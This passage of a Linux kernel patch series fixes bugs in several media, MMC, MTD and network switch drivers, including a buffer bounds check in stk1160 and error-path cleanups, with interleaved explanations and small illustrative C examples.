+ 	r = devm_request_irq(dev, pci_dev->irq, cio2_irq, IRQF_SHARED,
+ 			     CIO2_NAME, cio2);
+ 	if (r) {
+@@ -1810,6 +1805,11 @@ static int cio2_pci_probe(struct pci_dev *pci_dev,
+ 		goto fail_clean_notifier;
+ 	}
+ 
++	/* Register notifier for subdevices we care about */
++	r = cio2_parse_firmware(cio2);
++	if (r)
++		goto fail_clean_notifier;
++
+ 	pm_runtime_put_noidle(dev);
+ 	pm_runtime_allow(dev);
+ 
+diff --git a/drivers/media/pci/ngene/ngene-core.c b/drivers/media/pci/ngene/ngene-core.c
+index 7481f553f9595..24ec576dc3bff 100644
+--- a/drivers/media/pci/ngene/ngene-core.c
++++ b/drivers/media/pci/ngene/ngene-core.c
+@@ -1488,7 +1488,9 @@ static int init_channel(struct ngene_channel *chan)
+ 	}
+ 
+ 	if (dev->ci.en && (io & NGENE_IO_TSOUT)) {
+-		dvb_ca_en50221_init(adapter, dev->ci.en, 0, 1);
++		ret = dvb_ca_en50221_init(adapter, dev->ci.en, 0, 1);
++		if (ret != 0)
++			goto err;
+ 		set_transfer(chan, 1);
+ 		chan->dev->channel[2].DataFormatFlags = DF_SWAP32;
+ 		set_transfer(&chan->dev->channel[2], 1);
+diff --git a/drivers/media/platform/renesas/rcar-vin/rcar-vin.h b/drivers/media/platform/renesas/rcar-vin/rcar-vin.h
+index 1f94589d9ef14..0b144ed643791 100644
+--- a/drivers/media/platform/renesas/rcar-vin/rcar-vin.h
++++ b/drivers/media/platform/renesas/rcar-vin/rcar-vin.h
+@@ -58,7 +58,7 @@ enum rvin_isp_id {
+ 
+ #define RVIN_REMOTES_MAX \
+ 	(((unsigned int)RVIN_CSI_MAX) > ((unsigned int)RVIN_ISP_MAX) ? \
+-	 RVIN_CSI_MAX : RVIN_ISP_MAX)
++	 (unsigned int)RVIN_CSI_MAX : (unsigned int)RVIN_ISP_MAX)
+ 
+ /**
+  * enum rvin_dma_state - DMA states
+diff --git a/drivers/media/platform/sunxi/sun8i-a83t-mipi-csi2/Kconfig b/drivers/media/platform/sunxi/sun8i-a83t-mipi-csi2/Kconfig
+index 47a8c0fb7eb9f..99c401e653bc4 100644
+--- a/drivers/media/platform/sunxi/sun8i-a83t-mipi-csi2/Kconfig
++++ b/drivers/media/platform/sunxi/sun8i-a83t-mipi-csi2/Kconfig
+@@ -8,6 +8,7 @@ config VIDEO_SUN8I_A83T_MIPI_CSI2
+ 	select VIDEO_V4L2_SUBDEV_API
+ 	select V4L2_FWNODE
+ 	select REGMAP_MMIO
++	select GENERIC_PHY
+ 	select GENERIC_PHY_MIPI_DPHY
+ 	help
+ 	   Support for the Allwinner A83T MIPI CSI-2 controller and D-PHY.
+diff --git a/drivers/media/radio/radio-shark2.c b/drivers/media/radio/radio-shark2.c
+index f1c5c0a6a335c..e3e6aa87fe081 100644
+--- a/drivers/media/radio/radio-shark2.c
++++ b/drivers/media/radio/radio-shark2.c
+@@ -62,7 +62,7 @@ struct shark_device {
+ #ifdef SHARK_USE_LEDS
+ 	struct work_struct led_work;
+ 	struct led_classdev leds[NO_LEDS];
+-	char led_names[NO_LEDS][32];
++	char led_names[NO_LEDS][64];
+ 	atomic_t brightness[NO_LEDS];
+ 	unsigned long brightness_new;
+ #endif
+diff --git a/drivers/media/usb/b2c2/flexcop-usb.c b/drivers/media/usb/b2c2/flexcop-usb.c
+index 790787f0eba84..bcb24d8964981 100644
+--- a/drivers/media/usb/b2c2/flexcop-usb.c
++++ b/drivers/media/usb/b2c2/flexcop-usb.c
+@@ -515,7 +515,7 @@ static int flexcop_usb_init(struct flexcop_usb *fc_usb)
+ 
+ 	alt = fc_usb->uintf->cur_altsetting;
+ 
+-	if (alt->desc.bNumEndpoints < 1)
++	if (alt->desc.bNumEndpoints < 2)
+ 		return -ENODEV;
+ 	if (!usb_endpoint_is_isoc_in(&alt->endpoint[0].desc))
+ 		return -ENODEV;
+diff --git a/drivers/media/usb/stk1160/stk1160-video.c b/drivers/media/usb/stk1160/stk1160-video.c
+index 366f0e4a5dc0d..e79c45db60ab5 100644
+--- a/drivers/media/usb/stk1160/stk1160-video.c
++++ b/drivers/media/usb/stk1160/stk1160-video.c
+@@ -99,7 +99,7 @@ void stk1160_buffer_done(struct stk1160 *dev)
+ static inline
+ void stk1160_copy_video(struct stk1160 *dev, u8 *src, int len)
+ {
+-	int linesdone, lineoff, lencopy;
++	int linesdone, lineoff, lencopy, offset;
+ 	int bytesperline = dev->width * 2;
+ 	struct stk1160_buffer *buf = dev->isoc_ctl.buf;
+ 	u8 *dst = buf->mem;
+@@ -139,8 +139,13 @@ void stk1160_copy_video(struct stk1160 *dev, u8 *src, int len)
+ 	 * Check if we have enough space left in the buffer.
+ 	 * In that case, we force loop exit after copy.
+ 	 */
+-	if (lencopy > buf->bytesused - buf->length) {
+-		lencopy = buf->bytesused - buf->length;
++	offset = dst - (u8 *)buf->mem;
++	if (offset > buf->length) {
++		dev_warn_ratelimited(dev->dev, "out of bounds offset\n");
++		return;
++	}
++	if (lencopy > buf->length - offset) {
++		lencopy = buf->length - offset;
+ 		remain = lencopy;
+ 	}
+ 
+@@ -182,8 +187,13 @@ void stk1160_copy_video(struct stk1160 *dev, u8 *src, int len)
+ 		 * Check if we have enough space left in the buffer.
+ 		 * In that case, we force loop exit after copy.
+ 		 */
+-		if (lencopy > buf->bytesused - buf->length) {
+-			lencopy = buf->bytesused - buf->length;
++		offset = dst - (u8 *)buf->mem;
++		if (offset > buf->length) {
++			dev_warn_ratelimited(dev->dev, "offset out of bounds\n");
++			return;
++		}
++		if (lencopy > buf->length - offset) {
++			lencopy = buf->length - offset;
+ 			remain = lencopy;
+ 		}
+ 
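
The old clamp compared against buf->bytesused - buf->length, which underflows once bytesused trails length; the fix derives the true write position from the destination pointer and clamps against the real buffer size. The check in isolation (standalone, illustrative):

#include <stddef.h>
#include <stdint.h>

/* Returns how many of `want` bytes may be copied without running past
 * mem + length; 0 if the cursor is already out of bounds.
 */
static size_t clamp_copy(const uint8_t *mem, size_t length,
			 const uint8_t *dst, size_t want)
{
	size_t offset = (size_t)(dst - mem);	/* bytes already written */

	if (offset > length)
		return 0;			/* corrupt cursor: drop */

	return want > length - offset ? length - offset : want;
}
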
+diff --git a/drivers/misc/vmw_vmci/vmci_guest.c b/drivers/misc/vmw_vmci/vmci_guest.c
+index 4f8d962bb5b2a..1300ccab3d21b 100644
+--- a/drivers/misc/vmw_vmci/vmci_guest.c
++++ b/drivers/misc/vmw_vmci/vmci_guest.c
+@@ -625,7 +625,8 @@ static int vmci_guest_probe_device(struct pci_dev *pdev,
+ 	if (!vmci_dev) {
+ 		dev_err(&pdev->dev,
+ 			"Can't allocate memory for VMCI device\n");
+-		return -ENOMEM;
++		error = -ENOMEM;
++		goto err_unmap_mmio_base;
+ 	}
+ 
+ 	vmci_dev->dev = &pdev->dev;
+@@ -642,7 +643,8 @@ static int vmci_guest_probe_device(struct pci_dev *pdev,
+ 		if (!vmci_dev->tx_buffer) {
+ 			dev_err(&pdev->dev,
+ 				"Can't allocate memory for datagram tx buffer\n");
+-			return -ENOMEM;
++			error = -ENOMEM;
++			goto err_unmap_mmio_base;
+ 		}
+ 
+ 		vmci_dev->data_buffer = dma_alloc_coherent(&pdev->dev, VMCI_DMA_DG_BUFFER_SIZE,
+@@ -893,6 +895,10 @@ static int vmci_guest_probe_device(struct pci_dev *pdev,
+ err_free_data_buffers:
+ 	vmci_free_dg_buffers(vmci_dev);
+ 
++err_unmap_mmio_base:
++	if (mmio_base != NULL)
++		pci_iounmap(pdev, mmio_base);
++
+ 	/* The rest are managed resources and will be freed by PCI core */
+ 	return error;
+ }
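
Two early returns in the probe leaked the BAR mapping taken earlier; routing them through the new err_unmap_mmio_base label makes every post-map failure run pci_iounmap() exactly once. The canonical label-based unwind, reduced to two resources (names hypothetical):

#include <linux/pci.h>
#include <linux/slab.h>

static int demo_probe(struct pci_dev *pdev, void **out)
{
	void __iomem *mmio;
	void *buf;
	int error;

	mmio = pci_iomap(pdev, 0, 0);
	if (!mmio)
		return -ENOMEM;

	buf = kzalloc(64, GFP_KERNEL);
	if (!buf) {
		error = -ENOMEM;
		goto err_unmap;		/* only mmio needs undoing here */
	}

	*out = buf;	/* success; a real probe stashes both in drvdata */
	return 0;

err_unmap:
	pci_iounmap(pdev, mmio);
	return error;
}
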
+diff --git a/drivers/mmc/host/sdhci_am654.c b/drivers/mmc/host/sdhci_am654.c
+index c16dbe64859e6..52d6cc07e38cc 100644
+--- a/drivers/mmc/host/sdhci_am654.c
++++ b/drivers/mmc/host/sdhci_am654.c
+@@ -140,19 +140,26 @@ static const struct timing_data td[] = {
+ 
+ struct sdhci_am654_data {
+ 	struct regmap *base;
+-	bool legacy_otapdly;
+ 	int otap_del_sel[ARRAY_SIZE(td)];
+ 	int itap_del_sel[ARRAY_SIZE(td)];
++	u32 itap_del_ena[ARRAY_SIZE(td)];
+ 	int clkbuf_sel;
+ 	int trm_icp;
+ 	int drv_strength;
+ 	int strb_sel;
+ 	u32 flags;
+ 	u32 quirks;
++	bool dll_enable;
+ 
+ #define SDHCI_AM654_QUIRK_FORCE_CDTEST BIT(0)
+ };
+ 
++struct window {
++	u8 start;
++	u8 end;
++	u8 length;
++};
++
+ struct sdhci_am654_driver_data {
+ 	const struct sdhci_pltfm_data *pdata;
+ 	u32 flags;
+@@ -232,11 +239,13 @@ static void sdhci_am654_setup_dll(struct sdhci_host *host, unsigned int clock)
+ }
+ 
+ static void sdhci_am654_write_itapdly(struct sdhci_am654_data *sdhci_am654,
+-				      u32 itapdly)
++				      u32 itapdly, u32 enable)
+ {
+ 	/* Set ITAPCHGWIN before writing to ITAPDLY */
+ 	regmap_update_bits(sdhci_am654->base, PHY_CTRL4, ITAPCHGWIN_MASK,
+ 			   1 << ITAPCHGWIN_SHIFT);
++	regmap_update_bits(sdhci_am654->base, PHY_CTRL4, ITAPDLYENA_MASK,
++			   enable << ITAPDLYENA_SHIFT);
+ 	regmap_update_bits(sdhci_am654->base, PHY_CTRL4, ITAPDLYSEL_MASK,
+ 			   itapdly << ITAPDLYSEL_SHIFT);
+ 	regmap_update_bits(sdhci_am654->base, PHY_CTRL4, ITAPCHGWIN_MASK, 0);
+@@ -253,8 +262,8 @@ static void sdhci_am654_setup_delay_chain(struct sdhci_am654_data *sdhci_am654,
+ 	mask = SELDLYTXCLK_MASK | SELDLYRXCLK_MASK;
+ 	regmap_update_bits(sdhci_am654->base, PHY_CTRL5, mask, val);
+ 
+-	sdhci_am654_write_itapdly(sdhci_am654,
+-				  sdhci_am654->itap_del_sel[timing]);
++	sdhci_am654_write_itapdly(sdhci_am654, sdhci_am654->itap_del_sel[timing],
++				  sdhci_am654->itap_del_ena[timing]);
+ }
+ 
+ static void sdhci_am654_set_clock(struct sdhci_host *host, unsigned int clock)
+@@ -263,7 +272,6 @@ static void sdhci_am654_set_clock(struct sdhci_host *host, unsigned int clock)
+ 	struct sdhci_am654_data *sdhci_am654 = sdhci_pltfm_priv(pltfm_host);
+ 	unsigned char timing = host->mmc->ios.timing;
+ 	u32 otap_del_sel;
+-	u32 otap_del_ena;
+ 	u32 mask, val;
+ 
+ 	regmap_update_bits(sdhci_am654->base, PHY_CTRL1, ENDLL_MASK, 0);
+@@ -271,15 +279,10 @@ static void sdhci_am654_set_clock(struct sdhci_host *host, unsigned int clock)
+ 	sdhci_set_clock(host, clock);
+ 
+ 	/* Setup DLL Output TAP delay */
+-	if (sdhci_am654->legacy_otapdly)
+-		otap_del_sel = sdhci_am654->otap_del_sel[0];
+-	else
+-		otap_del_sel = sdhci_am654->otap_del_sel[timing];
+-
+-	otap_del_ena = (timing > MMC_TIMING_UHS_SDR25) ? 1 : 0;
++	otap_del_sel = sdhci_am654->otap_del_sel[timing];
+ 
+ 	mask = OTAPDLYENA_MASK | OTAPDLYSEL_MASK;
+-	val = (otap_del_ena << OTAPDLYENA_SHIFT) |
++	val = (0x1 << OTAPDLYENA_SHIFT) |
+ 	      (otap_del_sel << OTAPDLYSEL_SHIFT);
+ 
+ 	/* Write to STRBSEL for HS400 speed mode */
+@@ -294,10 +297,21 @@ static void sdhci_am654_set_clock(struct sdhci_host *host, unsigned int clock)
+ 
+ 	regmap_update_bits(sdhci_am654->base, PHY_CTRL4, mask, val);
+ 
+-	if (timing > MMC_TIMING_UHS_SDR25 && clock >= CLOCK_TOO_SLOW_HZ)
++	if (timing > MMC_TIMING_UHS_SDR25 && clock >= CLOCK_TOO_SLOW_HZ) {
+ 		sdhci_am654_setup_dll(host, clock);
+-	else
++		sdhci_am654->dll_enable = true;
++
++		if (timing == MMC_TIMING_MMC_HS400) {
++			sdhci_am654->itap_del_ena[timing] = 0x1;
++			sdhci_am654->itap_del_sel[timing] = sdhci_am654->itap_del_sel[timing - 1];
++		}
++
++		sdhci_am654_write_itapdly(sdhci_am654, sdhci_am654->itap_del_sel[timing],
++					  sdhci_am654->itap_del_ena[timing]);
++	} else {
+ 		sdhci_am654_setup_delay_chain(sdhci_am654, timing);
++		sdhci_am654->dll_enable = false;
++	}
+ 
+ 	regmap_update_bits(sdhci_am654->base, PHY_CTRL5, CLKBUFSEL_MASK,
+ 			   sdhci_am654->clkbuf_sel);
+@@ -310,19 +324,29 @@ static void sdhci_j721e_4bit_set_clock(struct sdhci_host *host,
+ 	struct sdhci_am654_data *sdhci_am654 = sdhci_pltfm_priv(pltfm_host);
+ 	unsigned char timing = host->mmc->ios.timing;
+ 	u32 otap_del_sel;
++	u32 itap_del_ena;
++	u32 itap_del_sel;
+ 	u32 mask, val;
+ 
+ 	/* Setup DLL Output TAP delay */
+-	if (sdhci_am654->legacy_otapdly)
+-		otap_del_sel = sdhci_am654->otap_del_sel[0];
+-	else
+-		otap_del_sel = sdhci_am654->otap_del_sel[timing];
++	otap_del_sel = sdhci_am654->otap_del_sel[timing];
+ 
+ 	mask = OTAPDLYENA_MASK | OTAPDLYSEL_MASK;
+ 	val = (0x1 << OTAPDLYENA_SHIFT) |
+ 	      (otap_del_sel << OTAPDLYSEL_SHIFT);
+-	regmap_update_bits(sdhci_am654->base, PHY_CTRL4, mask, val);
+ 
++	/* Setup Input TAP delay */
++	itap_del_ena = sdhci_am654->itap_del_ena[timing];
++	itap_del_sel = sdhci_am654->itap_del_sel[timing];
++
++	mask |= ITAPDLYENA_MASK | ITAPDLYSEL_MASK;
++	val |= (itap_del_ena << ITAPDLYENA_SHIFT) |
++	       (itap_del_sel << ITAPDLYSEL_SHIFT);
++
++	regmap_update_bits(sdhci_am654->base, PHY_CTRL4, ITAPCHGWIN_MASK,
++			   1 << ITAPCHGWIN_SHIFT);
++	regmap_update_bits(sdhci_am654->base, PHY_CTRL4, mask, val);
++	regmap_update_bits(sdhci_am654->base, PHY_CTRL4, ITAPCHGWIN_MASK, 0);
+ 	regmap_update_bits(sdhci_am654->base, PHY_CTRL5, CLKBUFSEL_MASK,
+ 			   sdhci_am654->clkbuf_sel);
+ 
+@@ -415,40 +439,105 @@ static u32 sdhci_am654_cqhci_irq(struct sdhci_host *host, u32 intmask)
+ 	return 0;
+ }
+ 
+-#define ITAP_MAX	32
++#define ITAPDLY_LENGTH 32
++#define ITAPDLY_LAST_INDEX (ITAPDLY_LENGTH - 1)
++
++static u32 sdhci_am654_calculate_itap(struct sdhci_host *host, struct window
++			  *fail_window, u8 num_fails, bool circular_buffer)
++{
++	u8 itap = 0, start_fail = 0, end_fail = 0, pass_length = 0;
++	u8 first_fail_start = 0, last_fail_end = 0;
++	struct device *dev = mmc_dev(host->mmc);
++	struct window pass_window = {0, 0, 0};
++	int prev_fail_end = -1;
++	u8 i;
++
++	if (!num_fails)
++		return ITAPDLY_LAST_INDEX >> 1;
++
++	if (fail_window->length == ITAPDLY_LENGTH) {
++		dev_err(dev, "No passing ITAPDLY, return 0\n");
++		return 0;
++	}
++
++	first_fail_start = fail_window->start;
++	last_fail_end = fail_window[num_fails - 1].end;
++
++	for (i = 0; i < num_fails; i++) {
++		start_fail = fail_window[i].start;
++		end_fail = fail_window[i].end;
++		pass_length = start_fail - (prev_fail_end + 1);
++
++		if (pass_length > pass_window.length) {
++			pass_window.start = prev_fail_end + 1;
++			pass_window.length = pass_length;
++		}
++		prev_fail_end = end_fail;
++	}
++
++	if (!circular_buffer)
++		pass_length = ITAPDLY_LAST_INDEX - last_fail_end;
++	else
++		pass_length = ITAPDLY_LAST_INDEX - last_fail_end + first_fail_start;
++
++	if (pass_length > pass_window.length) {
++		pass_window.start = last_fail_end + 1;
++		pass_window.length = pass_length;
++	}
++
++	if (!circular_buffer)
++		itap = pass_window.start + (pass_window.length >> 1);
++	else
++		itap = (pass_window.start + (pass_window.length >> 1)) % ITAPDLY_LENGTH;
++
++	return (itap > ITAPDLY_LAST_INDEX) ? ITAPDLY_LAST_INDEX >> 1 : itap;
++}
++
+ static int sdhci_am654_platform_execute_tuning(struct sdhci_host *host,
+ 					       u32 opcode)
+ {
+ 	struct sdhci_pltfm_host *pltfm_host = sdhci_priv(host);
+ 	struct sdhci_am654_data *sdhci_am654 = sdhci_pltfm_priv(pltfm_host);
+-	int cur_val, prev_val = 1, fail_len = 0, pass_window = 0, pass_len;
+-	u32 itap;
++	unsigned char timing = host->mmc->ios.timing;
++	struct window fail_window[ITAPDLY_LENGTH];
++	u8 curr_pass, itap;
++	u8 fail_index = 0;
++	u8 prev_pass = 1;
++
++	memset(fail_window, 0, sizeof(fail_window));
+ 
+ 	/* Enable ITAPDLY */
+-	regmap_update_bits(sdhci_am654->base, PHY_CTRL4, ITAPDLYENA_MASK,
+-			   1 << ITAPDLYENA_SHIFT);
++	sdhci_am654->itap_del_ena[timing] = 0x1;
++
++	for (itap = 0; itap < ITAPDLY_LENGTH; itap++) {
++		sdhci_am654_write_itapdly(sdhci_am654, itap, sdhci_am654->itap_del_ena[timing]);
+ 
+-	for (itap = 0; itap < ITAP_MAX; itap++) {
+-		sdhci_am654_write_itapdly(sdhci_am654, itap);
++		curr_pass = !mmc_send_tuning(host->mmc, opcode, NULL);
+ 
+-		cur_val = !mmc_send_tuning(host->mmc, opcode, NULL);
+-		if (cur_val && !prev_val)
+-			pass_window = itap;
++		if (!curr_pass && prev_pass)
++			fail_window[fail_index].start = itap;
++
++		if (!curr_pass) {
++			fail_window[fail_index].end = itap;
++			fail_window[fail_index].length++;
++		}
+ 
+-		if (!cur_val)
+-			fail_len++;
++		if (curr_pass && !prev_pass)
++			fail_index++;
+ 
+-		prev_val = cur_val;
++		prev_pass = curr_pass;
+ 	}
+-	/*
+-	 * Having determined the length of the failing window and start of
+-	 * the passing window calculate the length of the passing window and
+-	 * set the final value halfway through it considering the range as a
+-	 * circular buffer
+-	 */
+-	pass_len = ITAP_MAX - fail_len;
+-	itap = (pass_window + (pass_len >> 1)) % ITAP_MAX;
+-	sdhci_am654_write_itapdly(sdhci_am654, itap);
++
++	if (fail_window[fail_index].length != 0)
++		fail_index++;
++
++	itap = sdhci_am654_calculate_itap(host, fail_window, fail_index,
++					  sdhci_am654->dll_enable);
++
++	sdhci_am654_write_itapdly(sdhci_am654, itap, sdhci_am654->itap_del_ena[timing]);
++
++	/* Save ITAPDLY */
++	sdhci_am654->itap_del_sel[timing] = itap;
+ 
+ 	return 0;
+ }
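
The new tuning flow records each failing ITAPDLY range as a window, then sdhci_am654_calculate_itap() centres the final tap in the longest passing gap, wrapping the trailing gap onto the leading one when the DLL is enabled (circular mode). A standalone model of the selection with a made-up failure layout:

#include <stdio.h>
#include <stdint.h>

#define TAPS 32

struct win { uint8_t start, end; };	/* inclusive failing range */

static uint8_t pick_tap(const struct win *fail, int nfail, int circular)
{
	int best_start = 0, best_len = 0, prev_end = -1, i, len;

	if (!nfail)
		return (TAPS - 1) / 2;	/* all taps pass: take the middle */

	for (i = 0; i < nfail; i++) {
		len = fail[i].start - (prev_end + 1);	/* gap before window i */
		if (len > best_len) {
			best_start = prev_end + 1;
			best_len = len;
		}
		prev_end = fail[i].end;
	}

	/* Trailing gap; in circular mode it continues into the leading gap. */
	len = (TAPS - 1) - prev_end + (circular ? fail[0].start : 0);
	if (len > best_len) {
		best_start = prev_end + 1;
		best_len = len;
	}

	return (uint8_t)((best_start + best_len / 2) % TAPS);
}

int main(void)
{
	struct win fail[] = { { 4, 9 }, { 20, 23 } };

	/* Gaps: taps 0-3 (len 4), 10-19 (len 10), 24-31 (len 8 linear,
	 * 12 wrapped). Linear centres on 15; circular on (24 + 6) % 32 = 30.
	 */
	printf("linear %u, circular %u\n",
	       pick_tap(fail, 2, 0), pick_tap(fail, 2, 1));
	return 0;
}
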
+@@ -576,32 +665,15 @@ static int sdhci_am654_get_otap_delay(struct sdhci_host *host,
+ 	int i;
+ 	int ret;
+ 
+-	ret = device_property_read_u32(dev, td[MMC_TIMING_LEGACY].otap_binding,
+-				 &sdhci_am654->otap_del_sel[MMC_TIMING_LEGACY]);
+-	if (ret) {
+-		/*
+-		 * ti,otap-del-sel-legacy is mandatory, look for old binding
+-		 * if not found.
+-		 */
+-		ret = device_property_read_u32(dev, "ti,otap-del-sel",
+-					       &sdhci_am654->otap_del_sel[0]);
+-		if (ret) {
+-			dev_err(dev, "Couldn't find otap-del-sel\n");
+-
+-			return ret;
+-		}
+-
+-		dev_info(dev, "Using legacy binding ti,otap-del-sel\n");
+-		sdhci_am654->legacy_otapdly = true;
+-
+-		return 0;
+-	}
+-
+ 	for (i = MMC_TIMING_LEGACY; i <= MMC_TIMING_MMC_HS400; i++) {
+ 
+ 		ret = device_property_read_u32(dev, td[i].otap_binding,
+ 					       &sdhci_am654->otap_del_sel[i]);
+ 		if (ret) {
++			if (i == MMC_TIMING_LEGACY) {
++				dev_err(dev, "Couldn't find mandatory ti,otap-del-sel-legacy\n");
++				return ret;
++			}
+ 			dev_dbg(dev, "Couldn't find %s\n",
+ 				td[i].otap_binding);
+ 			/*
+@@ -614,9 +686,12 @@ static int sdhci_am654_get_otap_delay(struct sdhci_host *host,
+ 				host->mmc->caps2 &= ~td[i].capability;
+ 		}
+ 
+-		if (td[i].itap_binding)
+-			device_property_read_u32(dev, td[i].itap_binding,
+-						 &sdhci_am654->itap_del_sel[i]);
++		if (td[i].itap_binding) {
++			ret = device_property_read_u32(dev, td[i].itap_binding,
++						       &sdhci_am654->itap_del_sel[i]);
++			if (!ret)
++				sdhci_am654->itap_del_ena[i] = 0x1;
++		}
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/mtd/mtdcore.c b/drivers/mtd/mtdcore.c
+index 24518e5e1b5e4..ad527bdbd4632 100644
+--- a/drivers/mtd/mtdcore.c
++++ b/drivers/mtd/mtdcore.c
+@@ -942,8 +942,10 @@ static int mtd_otp_nvmem_add(struct mtd_info *mtd)
+ 
+ 	if (mtd->_get_user_prot_info && mtd->_read_user_prot_reg) {
+ 		size = mtd_otp_size(mtd, true);
+-		if (size < 0)
+-			return size;
++		if (size < 0) {
++			err = size;
++			goto err;
++		}
+ 
+ 		if (size > 0) {
+ 			nvmem = mtd_otp_nvmem_register(mtd, "user-otp", size,
+diff --git a/drivers/mtd/nand/raw/nand_hynix.c b/drivers/mtd/nand/raw/nand_hynix.c
+index 0d4d4bbfdecea..49e36767d8f76 100644
+--- a/drivers/mtd/nand/raw/nand_hynix.c
++++ b/drivers/mtd/nand/raw/nand_hynix.c
+@@ -402,7 +402,7 @@ static int hynix_nand_rr_init(struct nand_chip *chip)
+ 	if (ret)
+ 		pr_warn("failed to initialize read-retry infrastructure");
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ static void hynix_nand_extract_oobsize(struct nand_chip *chip,
+diff --git a/drivers/net/Makefile b/drivers/net/Makefile
+index 6ce076462dbfd..c2f4d4bbf65aa 100644
+--- a/drivers/net/Makefile
++++ b/drivers/net/Makefile
+@@ -48,7 +48,9 @@ obj-$(CONFIG_ARCNET) += arcnet/
+ obj-$(CONFIG_DEV_APPLETALK) += appletalk/
+ obj-$(CONFIG_CAIF) += caif/
+ obj-$(CONFIG_CAN) += can/
+-obj-$(CONFIG_NET_DSA) += dsa/
++ifdef CONFIG_NET_DSA
++obj-y += dsa/
++endif
+ obj-$(CONFIG_ETHERNET) += ethernet/
+ obj-$(CONFIG_FDDI) += fddi/
+ obj-$(CONFIG_HIPPI) += hippi/
+diff --git a/drivers/net/dsa/microchip/ksz_common.c b/drivers/net/dsa/microchip/ksz_common.c
+index dc9eea3c8ab16..f9f43897f86c1 100644
+--- a/drivers/net/dsa/microchip/ksz_common.c
++++ b/drivers/net/dsa/microchip/ksz_common.c
+@@ -2540,7 +2540,7 @@ phy_interface_t ksz_get_xmii(struct ksz_device *dev, int port, bool gbit)
+ 		else
+ 			interface = PHY_INTERFACE_MODE_MII;
+ 	} else if (val == bitval[P_RMII_SEL]) {
+-		interface = PHY_INTERFACE_MODE_RGMII;
++		interface = PHY_INTERFACE_MODE_RMII;
+ 	} else {
+ 		interface = PHY_INTERFACE_MODE_RGMII;
+ 		if (data8 & P_RGMII_ID_EG_ENABLE)
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index 517c50d11fbce..dc4ff8a6d0bf5 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -3003,6 +3003,7 @@ static int mv88e6xxx_software_reset(struct mv88e6xxx_chip *chip)
+ static void mv88e6xxx_hardware_reset(struct mv88e6xxx_chip *chip)
+ {
+ 	struct gpio_desc *gpiod = chip->reset;
++	int err;
+ 
+ 	/* If there is a GPIO connected to the reset pin, toggle it */
+ 	if (gpiod) {
+@@ -3011,17 +3012,26 @@ static void mv88e6xxx_hardware_reset(struct mv88e6xxx_chip *chip)
+ 		 * mid-byte, causing the first EEPROM read after the reset
+ 		 * from the wrong location resulting in the switch booting
+ 		 * to wrong mode and inoperable.
++		 * For this reason, switch families with EEPROM support
++		 * generally wait for EEPROM loads to complete as their pre-
++		 * and post-reset handlers.
+ 		 */
+-		if (chip->info->ops->get_eeprom)
+-			mv88e6xxx_g2_eeprom_wait(chip);
++		if (chip->info->ops->hardware_reset_pre) {
++			err = chip->info->ops->hardware_reset_pre(chip);
++			if (err)
++				dev_err(chip->dev, "pre-reset error: %d\n", err);
++		}
+ 
+ 		gpiod_set_value_cansleep(gpiod, 1);
+ 		usleep_range(10000, 20000);
+ 		gpiod_set_value_cansleep(gpiod, 0);
+ 		usleep_range(10000, 20000);
+ 
+-		if (chip->info->ops->get_eeprom)
+-			mv88e6xxx_g2_eeprom_wait(chip);
++		if (chip->info->ops->hardware_reset_post) {
++			err = chip->info->ops->hardware_reset_post(chip);
++			if (err)
++				dev_err(chip->dev, "post-reset error: %d\n", err);
++		}
+ 	}
+ }
+ 
+@@ -4339,6 +4349,8 @@ static const struct mv88e6xxx_ops mv88e6141_ops = {
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
+ 	.mgmt_rsvd2cpu =  mv88e6390_g1_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6390_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -4529,6 +4541,8 @@ static const struct mv88e6xxx_ops mv88e6172_ops = {
+ 	.watchdog_ops = &mv88e6097_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6352_g2_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6352_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -4630,6 +4644,8 @@ static const struct mv88e6xxx_ops mv88e6176_ops = {
+ 	.watchdog_ops = &mv88e6097_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6352_g2_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6352_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -4731,6 +4747,8 @@ static const struct mv88e6xxx_ops mv88e6190_ops = {
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6390_g1_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6390_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -4794,6 +4812,8 @@ static const struct mv88e6xxx_ops mv88e6190x_ops = {
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6390_g1_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6390_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
